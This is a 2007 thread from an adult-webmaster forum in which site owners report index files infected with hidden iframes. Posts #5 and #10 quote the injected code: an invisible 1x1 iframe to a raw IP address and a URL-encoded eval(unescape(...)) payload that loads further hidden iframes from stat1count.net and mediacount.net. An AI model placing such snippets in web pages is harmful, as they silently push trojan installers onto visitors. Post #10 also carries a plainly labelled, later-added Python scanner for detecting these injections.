Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

Old 09-02-2007, 04:38 AM   #1
Antonio
:mad more than 100 of my sites infected with trojans - check yours

first of all a big thanks to KimJI for pointing it out to me


the sites are on two hosts, dreamhost and rocketflow, all my other hosts seem ok

anyway, if you have sites on these two hosts, you should check them - one line of iframe code in the index file, no idea what the code does




what a lovely way to spend your Sunday morning
Old 09-02-2007, 04:54 AM   #2
Aussie Rebel
Can you please post the code so we know what we are looking for? thanks
Old 09-02-2007, 05:04 AM   #3
Matt 26z
Are you running any scripts that may have a security hole?
Old 09-02-2007, 05:29 AM   #4
BOSS1
Damn good that you noticed before you lost all bookmarkers!
Old 09-02-2007, 05:30 AM   #5
Antonio
Quote:
Originally Posted by Aussie Rebel View Post
Can you please post the code so we know what we are looking for? thanks

Code:
<iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

as I said no idea what it does and I don't want to know but I know for sure that I didn't put it there


Quote:
Originally Posted by Matt 26z View Post
Are you running any scripts that may have a security hole?

nope, at first I thought it was from the recent linkex security hole, but when I started checking my sites - ALL of them were infected (I have linkex on only 15 sites or so), some of them are wordpress blogs, some are single index html file, some are running tgp scripts, basically mixed bag of goodies
Old 09-02-2007, 05:49 AM   #6
gooddomains
fucking spyware
Old 09-02-2007, 05:55 AM   #7
ladida
It's a trojan installer. You're in for some mess.
Old 09-02-2007, 06:00 AM   #8
facialfreak
Seems to be an epidemic with Dreamhost'ed sites ...

And it's too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ...

I feel your pain Antonio, but unfortunately it usually takes something of this nature for webmasters to take a crash course in simple website security.
Old 09-02-2007, 08:41 AM   #9
Scootermuze
I had that happen on a few sites of mine from a different server... I guess the perps just make their rounds from host to host..

I started checking them daily and removing the script as they popped up.. eventually went away...
Old 09-02-2007, 08:47 AM   #10
Quickdraw
Here is another hack that has hit Dreamhost for sites like dommephonesex.com, thecollegeslut.com, beckybank.com, fortheloveoffeet.com, bbwbecky.com
and haven't been fixed for months..

Code:
>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%74%61%74%31%63%6f%75%6e%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%31%36%37%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));
which turns to this
iframe src=http://stat1count.net/strong/167

and they also have iframe as well

<iframe src='hxxp://mediacount.net/adv/013/new.php' width=1 height=1>
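An added example, not code posted by anyone in this thread: a Python check that flags invisible iframes like the one in post #5 and also decodes, without executing it, an eval(unescape('%..')) wrapper like the one in post #10, so index files can be checked in bulk. The function names, the sample page and its hosts are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import unquote

# eval(unescape('%xx%xx...')) wrapper of the kind quoted in the thread
PACKED = re.compile(r"eval\(\s*unescape\(\s*(['\"])((?:%[0-9a-fA-F]{2})+)\1\s*\)\s*\)")

def _invisible(attrs):
    """True for a frame sized 0 or 1 pixel, or hidden by inline CSS."""
    tiny = lambda v: (v or "").strip().rstrip("px") in ("0", "1")
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return ((tiny(attrs.get("width")) and tiny(attrs.get("height")))
            or "visibility:hidden" in style or "display:none" in style)

class _Frames(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src") and _invisible(a):
            self.hits.append(a["src"])

def find_hidden_iframes(html, depth=0):
    """Return src of each invisible iframe, also inside packed layers (decoded, never run)."""
    parser = _Frames()
    parser.feed(html)
    parser.close()
    hits = list(parser.hits)
    if depth < 3:  # bound the number of nested packed layers
        for m in PACKED.finditer(html):
            hits += find_hidden_iframes(unquote(m.group(2)), depth + 1)
    return hits

def scan_tree(root):
    """Map each index.* file under root to the hidden frame URLs in it."""
    files = (p for p in Path(root).rglob("index.*") if p.is_file())
    report = {str(p): find_hidden_iframes(p.read_text(errors="replace")) for p in files}
    return {name: urls for name, urls in report.items() if urls}

# Constructed sample page (reserved example hosts, not the thread's URLs)
_inner = "document.write('<iframe src=http://tracker.example/a/1/ width=1 height=1></iframe>');"
SAMPLE = ("<html><body><h1>My site</h1>"
          '<iframe src="http://video.example/embed" width="640" height="360"></iframe>'
          "<iframe src='http://192.0.2.10/x/index.php' width='1' height='1' "
          "style='visibility: hidden;'></iframe>"
          "<script>eval(unescape('" + "".join("%%%02x" % b for b in _inner.encode()) + "'));</script>"
          "</body></html>")
```

`find_hidden_iframes(SAMPLE)` reports the two hidden frames and leaves the visible 640x360 embed alone; `scan_tree("/path/to/docroot")` runs the same check over every index.* file under a directory.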
Old 09-02-2007, 08:52 AM   #11
ridikuloz
happened to me before.... fuckin' russians :X
Old 09-02-2007, 09:39 AM   #12
TeenCat
umm ... i think i am on the internet thanks for sharing that info!
Old 09-02-2007, 11:39 AM   #13
Mutt
i had that one months ago - removed it and it never came back. i did have a WordPress installation on the server and that's the only guess I have for how they got in.
Old 09-02-2007, 11:48 AM   #14
GrouchyAdmin
This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account, and directories are not properly chowned.

There's a performance hit for it, but it's well worth the cost of administration and notifying your clients. One old WP 1.5 install doesn't destroy hundreds of sites.
Old 09-02-2007, 11:50 AM   #15
Pornopat
Had that one and it gave me a fucking headache for months. It just kept coming back in different forms.
Old 10-04-2007, 02:26 AM   #16
d-null
bumping this because I just noticed that I have been hit on two different hosts

my own site triggered my norton virus detection and I checked and it is the same code but mine was directing to mediacount.net

bastards
Old 10-04-2007, 02:38 AM   #17
d-null
I notice that mediacount.net is a russian site as well.

Check your index.html files... they only got into my main domains (not the subdomains)
Old 10-04-2007, 05:01 AM   #18
cess
Quote:
Originally Posted by facialfreak View Post
Seems to be an epidemic with Dreamhost'ed sites ...

And it's too bad really ... Dreamhost leaves all files owned by apache by default, so your sites might as well have a flashing neon sign inviting cyber criminals ...
Eh?? I have two accounts with dreamhost and every domain I've ever added always had extra web security "enabled". Every file on my dreamhost accounts is owned by my user name and not apache.
Old 10-04-2007, 05:12 AM   #19
cess
Quote:
Originally Posted by GrouchyAdmin View Post
This is the problem you have when you run a virtualhost without SuExec/SuPHP permissions to set them to the specific user account

By default dreamhost does enable that.
Old 10-04-2007, 11:18 AM   #20
d-null
mine was not dreamhost and I found the problem on two completely separate distinct servers, so it is a good idea to check your files periodically no matter who you are hosting with
Old 10-04-2007, 12:52 PM   #21
Az A Bay Bay
congrats!
Old 10-04-2007, 12:56 PM   #22
riddler
rocketflow servers seem to get rooted a lot.
Old 10-04-2007, 01:26 PM   #23
alby_persignup
another trojan attacks!